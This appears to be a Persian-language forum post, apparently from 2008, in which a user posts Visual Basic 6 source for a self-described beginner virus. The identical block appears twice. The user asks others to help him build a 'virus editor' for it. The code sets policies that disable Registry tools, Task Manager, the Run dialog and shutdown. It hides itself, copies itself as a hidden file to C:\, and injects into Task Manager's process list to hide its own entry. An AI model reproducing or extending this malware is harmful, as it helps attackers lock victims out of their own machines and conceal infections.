مشاهده نسخه کامل
: Sadegh 2007
06-04-2008, 19:38
کی بلد برای ویروس یک editor درست کنه اگه شما بلدید لطفا یاد من بدید این هم کد ویروس برای ساخت editor ویروس اش هم مقدماتی
این Module برای رجیستریش
Public Const HKEY_CURRENT_USER = &H80000001
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Function GetString(hKey As Long, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
r = RegOpenKey(hKey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function
Public Sub SaveString(hKey As Long, strPath As String, strValue As String, strdata As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(hKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
r = RegCloseKey(keyhand)
End Sub
Function GetDword(ByVal hKey As Long, ByVal strPath As String, ByVal strValueName As String) As Long
Dim lResult As Long
Dim lValueType As Long
Dim lBuf As Long
Dim lDataBufSize As Long
Dim r As Long
Dim keyhand As Long
r = RegOpenKey(hKey, strPath, keyhand)
lDataBufSize = 4
lResult = RegQueryValueEx(keyhand, strValueName, 0&, lValueType, lBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
If lValueType = REG_DWORD Then
GetDword = lBuf
End If
End If
r = RegCloseKey(keyhand)
End Function
Function SaveDword(ByVal hKey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)
Dim lResult As Long
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(hKey, strPath, keyhand)
lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)
r = RegCloseKey(keyhand)
End Function
و این Module برای پنهان شدن در Taskmgr
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function WaitForSingleObject Lib "kernel32.dll" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Public Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Public Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Public Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function RegisterServiceProcess Lib "kernel32.dll" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Public Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Public Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
و اینهم در Form
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Dim Address As String
Dim bp As Long
Dim pbag As PropertyBag
Dim arr() As Byte
Private Sub Form_Load()
On Error GoTo Handler
Me.Hide
App.TaskVisible = False
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \System", "DisableRegistryTools", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoRun", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoClose", 1)
Address = String$(128, Chr$(0))
Address = Left$(Address, GetModuleFileName(hInst, Address, Len(Address)))
On Error GoTo Handler
FileCopy Address, "C:\" + App.EXEName + ".exe"
SetAttr "C:\" + App.EXEName + ".exe", vbHidden
Hide_Process "Me"
Exit Sub
Handler:
Err.Clear
End Sub
Private Sub Timer1_Timer()
Me.Hide
App.TaskVisible = False
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \System", "DisableRegistryTools", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \System", "DisableTaskmgr", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoRun", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoClose", 1)
Address = String$(128, Chr$(0))
Address = Left$(Address, GetModuleFileName(hInst, Address, Len(Address)))
On Error GoTo Handler
FileCopy Address, "C:\" + App.EXEName + ".exe"
SetAttr "C:\" + App.EXEName + ".exe", vbHidden
Exit Sub
Handler:
Err.Clear
End Sub
Private Sub Hide_Process(Name As String)
On Error Resume Next
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim Pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, Pid)
hProcess = OpenProcess(1082, 0, Pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
CloseHandle hTid
End Sub
اگه بلدید لطفا کمک کنید:10:
این Module برای رجیستریش
Public Const HKEY_CURRENT_USER = &H80000001
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
Public Function GetString(hKey As Long, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
r = RegOpenKey(hKey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function
Public Sub SaveString(hKey As Long, strPath As String, strValue As String, strdata As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(hKey, strPath, keyhand)
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
r = RegCloseKey(keyhand)
End Sub
Function GetDword(ByVal hKey As Long, ByVal strPath As String, ByVal strValueName As String) As Long
Dim lResult As Long
Dim lValueType As Long
Dim lBuf As Long
Dim lDataBufSize As Long
Dim r As Long
Dim keyhand As Long
r = RegOpenKey(hKey, strPath, keyhand)
lDataBufSize = 4
lResult = RegQueryValueEx(keyhand, strValueName, 0&, lValueType, lBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
If lValueType = REG_DWORD Then
GetDword = lBuf
End If
End If
r = RegCloseKey(keyhand)
End Function
Function SaveDword(ByVal hKey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)
Dim lResult As Long
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(hKey, strPath, keyhand)
lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)
r = RegCloseKey(keyhand)
End Function
و این Module برای پنهان شدن در Taskmgr
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function WaitForSingleObject Lib "kernel32.dll" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Public Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Public Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Public Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function RegisterServiceProcess Lib "kernel32.dll" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Public Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Public Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
و اینهم در Form
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Dim Address As String
Dim bp As Long
Dim pbag As PropertyBag
Dim arr() As Byte
Private Sub Form_Load()
On Error GoTo Handler
Me.Hide
App.TaskVisible = False
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \System", "DisableRegistryTools", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoRun", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoClose", 1)
Address = String$(128, Chr$(0))
Address = Left$(Address, GetModuleFileName(hInst, Address, Len(Address)))
On Error GoTo Handler
FileCopy Address, "C:\" + App.EXEName + ".exe"
SetAttr "C:\" + App.EXEName + ".exe", vbHidden
Hide_Process "Me"
Exit Sub
Handler:
Err.Clear
End Sub
Private Sub Timer1_Timer()
Me.Hide
App.TaskVisible = False
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \System", "DisableRegistryTools", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \System", "DisableTaskmgr", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoRun", 1)
Call SaveDword(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", "NoClose", 1)
Address = String$(128, Chr$(0))
Address = Left$(Address, GetModuleFileName(hInst, Address, Len(Address)))
On Error GoTo Handler
FileCopy Address, "C:\" + App.EXEName + ".exe"
SetAttr "C:\" + App.EXEName + ".exe", vbHidden
Exit Sub
Handler:
Err.Clear
End Sub
Private Sub Hide_Process(Name As String)
On Error Resume Next
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim Pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, Pid)
hProcess = OpenProcess(1082, 0, Pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
CloseHandle hTid
End Sub
اگه بلدید لطفا کمک کنید:10: